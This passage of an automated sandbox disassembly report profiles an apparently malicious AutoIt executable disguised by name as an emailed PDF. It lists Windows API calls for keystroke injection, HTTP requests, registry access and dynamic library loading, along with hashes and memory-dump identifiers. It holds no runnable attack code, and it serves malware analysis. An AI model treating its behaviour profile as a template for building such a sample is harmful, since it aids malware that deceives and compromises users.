                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7702
                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,007DFB80,000000FF,?,00000000,00000800,00000000,?,007E2C7C,?), ref: 007A7727
                                                                                                          • _memcmp.LIBCMT ref: 007A7748
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                                          • String ID: ,,~
                                                                                                          • API String ID: 314563124-1083855107
                                                                                                          • Opcode ID: c506db4998806c834058f624b1382f9d2dec60b8b61ef4d4721446590f1f8400
                                                                                                          • Instruction ID: 94b54b4318dc628ed1ac3981bc60d5b4f2ae715e75ce650f5c0eb0ff0cf96d46
                                                                                                          • Opcode Fuzzy Hash: c506db4998806c834058f624b1382f9d2dec60b8b61ef4d4721446590f1f8400
                                                                                                          • Instruction Fuzzy Hash: 9481FD75A00109EFCB04DFA4C988EEEB7B9FF89315F204559F506AB250DB75AE06CB60
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007C8613
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007C8722
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007C889A
                                                                                                            • Part of subcall function 007B7562: VariantInit.OLEAUT32(00000000), ref: 007B75A2
                                                                                                            • Part of subcall function 007B7562: VariantCopy.OLEAUT32(00000000,?), ref: 007B75AB
                                                                                                            • Part of subcall function 007B7562: VariantClear.OLEAUT32(00000000), ref: 007B75B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                          • Opcode ID: df67596729ef695e47034be3773796c2c5047522f55dd47ebb3c3ab56f74081d
                                                                                                          • Instruction ID: 727fd32a8b1788c0dfc076f4b815ef0077ac1b537ae6b7889ffbdee55916ad3b
                                                                                                          • Opcode Fuzzy Hash: df67596729ef695e47034be3773796c2c5047522f55dd47ebb3c3ab56f74081d
                                                                                                          • Instruction Fuzzy Hash: 88917D71604301DFC750DF24C485E5AB7E4EF89714F14892EF99A9B362DB38E909CB92
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_free
                                                                                                          • String ID: 3cv$_v
                                                                                                          • API String ID: 2620147621-436345795
                                                                                                          • Opcode ID: 07fbfab121ef3cbd8ab89d774b486235b9ecc1fe04d620e968c68b05e94d33f8
                                                                                                          • Instruction ID: abc856bf91774542f5dabcdd00c45eef779825940553737781b70b412bdfa0cc
                                                                                                          • Opcode Fuzzy Hash: 07fbfab121ef3cbd8ab89d774b486235b9ecc1fe04d620e968c68b05e94d33f8
                                                                                                          • Instruction Fuzzy Hash: EE515C716043819FDB25CF28C480B6ABBE5FF85354F44892DE99A97351EB39E901CB82
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$_memmove
                                                                                                          • String ID: 3cv$ERCP
                                                                                                          • API String ID: 2532777613-1321837940
                                                                                                          • Opcode ID: d708cb000a235094c26406c2acbc17c238866f488bee5655cf6ba2dcbe4e1169
                                                                                                          • Instruction ID: 95dc10621b547ade16d4e63bedf5176fe4559766ba8f26bdd99db04cc07a400e
                                                                                                          • Opcode Fuzzy Hash: d708cb000a235094c26406c2acbc17c238866f488bee5655cf6ba2dcbe4e1169
                                                                                                          • Instruction Fuzzy Hash: 7951A371A00305DFDB24CFA5C8857AAB7E4FF44314F60896EE94AC7291E778E944CB80
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B27C0
                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007B27DC
                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 007B2822
                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00815890,00000000), ref: 007B286B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                          • Opcode ID: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                                                                                                          • Instruction ID: 9c0182b6f52ad7bdc0349413ff1c5040ee4dcbfa45653c4b774e3e2b1f866091
                                                                                                          • Opcode Fuzzy Hash: 9de7e8b9d82505bed67fa29228ecaedbdcc97e839f7bf9d029c565f342179c4a
                                                                                                          • Instruction Fuzzy Hash: 7041B2702063019FD724DF24DC48B9ABBE4EF85314F144A2EF96697292D738E906CB62
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B0B27
                                                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 007B0B43
                                                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007B0BA9
                                                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007B0BFB
                                                                                                          Strings
                                                                                                          • 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621, xrefs: 007B0B5D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621
                                                                                                          • API String ID: 432972143-1561487433
                                                                                                          • Opcode ID: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                                                                                                          • Instruction ID: 8019153331736176fd08e3a7a2f860103b2f5a0b8374b92ad5de7f4b3bddbd35
                                                                                                          • Opcode Fuzzy Hash: a8f9535e804290cbaac6f3c3d0f597245d99444dc1633f75412c2df5584f6b0b
                                                                                                          • Instruction Fuzzy Hash: AB315AB0D40208AEFF308B658C09BFBBBA5EB45314F08835AF491521E1C37C895097E5
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 007B0C66
                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 007B0C82
                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 007B0CE1
                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 007B0D33
                                                                                                          Strings
                                                                                                          • 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621, xrefs: 007B0C9F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621
                                                                                                          • API String ID: 432972143-1561487433
                                                                                                          • Opcode ID: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                                                                                                          • Instruction ID: 1137943b310915d78513b19444ecd0c59df2f57ea7083d635ad1a27de121436b
                                                                                                          • Opcode Fuzzy Hash: 0b23d4a61c9f3462b1e2b0b2a1ae2c9ac575ce7e2974371920cf263585499dbb
                                                                                                          • Instruction Fuzzy Hash: 7A312430A40618AEFF308A658818BFFBFB6AB85320F08871BE485521D1D73D995597E5
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CD7C5
                                                                                                            • Part of subcall function 0075784B: _memmove.LIBCMT ref: 00757899
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharLower_memmove
                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                          • API String ID: 3425801089-567219261
                                                                                                          • Opcode ID: 49d03deb2aab6d825fd8a0ccceff3de83195e53913445250977df99bcfe04f52
                                                                                                          • Instruction ID: 42ae782cd4cffd3c1f160f2ee54d710a84db291c7612cca5d20a08bae617e691
                                                                                                          • Opcode Fuzzy Hash: 49d03deb2aab6d825fd8a0ccceff3de83195e53913445250977df99bcfe04f52
                                                                                                          • Instruction Fuzzy Hash: F5316971904219EBCF14EF94CC56AEEB3B5FF04720B10862DE869976D1DB79AD09CB80
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007A8F14
                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007A8F27
                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 007A8F57
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 365058703-1403004172
                                                                                                          • Opcode ID: 2d5e849580bf81b0ebecd54c700206a8f1223a6439e74727099a98125f81cce7
                                                                                                          • Instruction ID: 955fb43cd7bb04c458a4ff4c442c358d0dea3bad797e156af8c467ea7a0b5dfd
                                                                                                          • Opcode Fuzzy Hash: 2d5e849580bf81b0ebecd54c700206a8f1223a6439e74727099a98125f81cce7
                                                                                                          • Instruction Fuzzy Hash: DB21F271A05105FEDB18ABB09C49DFEB779DF46360F048229F825A72E0DB7D5809D610
                                                                                                          APIs
                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C184C
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1872
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C18A2
                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 007C18E9
                                                                                                            • Part of subcall function 007C2483: GetLastError.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C2498
                                                                                                            • Part of subcall function 007C2483: SetEvent.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C24AD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                          • Opcode ID: 866753718bec327c6b8c38dcb63f56fe9abc5e16bb021539d56bc7d4d079c5ff
                                                                                                          • Instruction ID: b91b5ca49c09c68ede90a608c1df3ad3e1e7b62decb91c35b2c660ec24f9e246
                                                                                                          • Opcode Fuzzy Hash: 866753718bec327c6b8c38dcb63f56fe9abc5e16bb021539d56bc7d4d079c5ff
                                                                                                          • Instruction Fuzzy Hash: 6221B0B1504308BFEB11AB60CC89FBB77FDEB49764F50813EF90592141DB289D0597A0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00751D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00751D73
                                                                                                            • Part of subcall function 00751D35: GetStockObject.GDI32(00000011), ref: 00751D87
                                                                                                            • Part of subcall function 00751D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00751D91
                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D6461
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 007D6468
                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D647D
                                                                                                          • DestroyWindow.USER32(?), ref: 007D6485
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                          • Opcode ID: 1bdb991a89e1162e471ffe1b14f1059c1f1128b51bf193f15c99d30b70510e66
                                                                                                          • Instruction ID: 1bf618bf357afa60776152f585147e50b668c58da5797b811cf87cf0d2e02631
                                                                                                          • Opcode Fuzzy Hash: 1bdb991a89e1162e471ffe1b14f1059c1f1128b51bf193f15c99d30b70510e66
                                                                                                          • Instruction Fuzzy Hash: 56218871200245EFEF108FA4DC84EBB37BDEF58768F20862AFA5092290D779DC41A760
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 007B6DBC
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B6DEF
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 007B6E01
                                                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007B6E3B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 006fe4e2317b55d5ec2262349a8b85c8afa0af1f638c36b37b8314534aa97fa3
                                                                                                          • Instruction ID: 5c902ce7359f947b084e15efd4bf70cf677179e363c4c9883e862e1634e1398a
                                                                                                          • Opcode Fuzzy Hash: 006fe4e2317b55d5ec2262349a8b85c8afa0af1f638c36b37b8314534aa97fa3
                                                                                                          • Instruction Fuzzy Hash: 44215175700209ABDF209F29DC05BDA7BB4FF45720F204A29FEA1D72D0D778A9508B54
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 007B6E89
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007B6EBB
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 007B6ECC
                                                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007B6F06
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 10b67a598e515c3377e868f4c6574585d705556f10ee03dd62208201d9cec474
                                                                                                          • Instruction ID: be001a9120438d95aa0945378bdfab7bdc1673d59c9d75ffb6b4dc600e4679f2
                                                                                                          • Opcode Fuzzy Hash: 10b67a598e515c3377e868f4c6574585d705556f10ee03dd62208201d9cec474
                                                                                                          • Instruction Fuzzy Hash: 1D2190795003059BDB209F69DC04BEA77A8FF45720F204A1AFAA1D72D0E77CE8508B60
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007BAC54
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007BACA8
                                                                                                          • __swprintf.LIBCMT ref: 007BACC1
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,007DF910), ref: 007BACFF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                          • String ID: %lu
                                                                                                          • API String ID: 3164766367-685833217
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B115F
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B1184
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B118E
                                                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,007AFCED,?,007B0D40,?,00008000), ref: 007B11C1
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                          • String ID: @{
                                                                                                          • API String ID: 2875609808-4255285803
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 007B1B19
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                          • API String ID: 3964851224-769500911
                                                                                                          APIs
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007CEC07
                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007CEC37
                                                                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007CED6A
                                                                                                          • CloseHandle.KERNEL32(?), ref: 007CEDEB
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2364364464-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                            • Part of subcall function 007D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D00FD
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D013C
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D0183
                                                                                                          • RegCloseKey.ADVAPI32(?,?), ref: 007D01AF
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007D01BC
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 3440857362-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CD927
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007CD9AA
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 007CD9C6
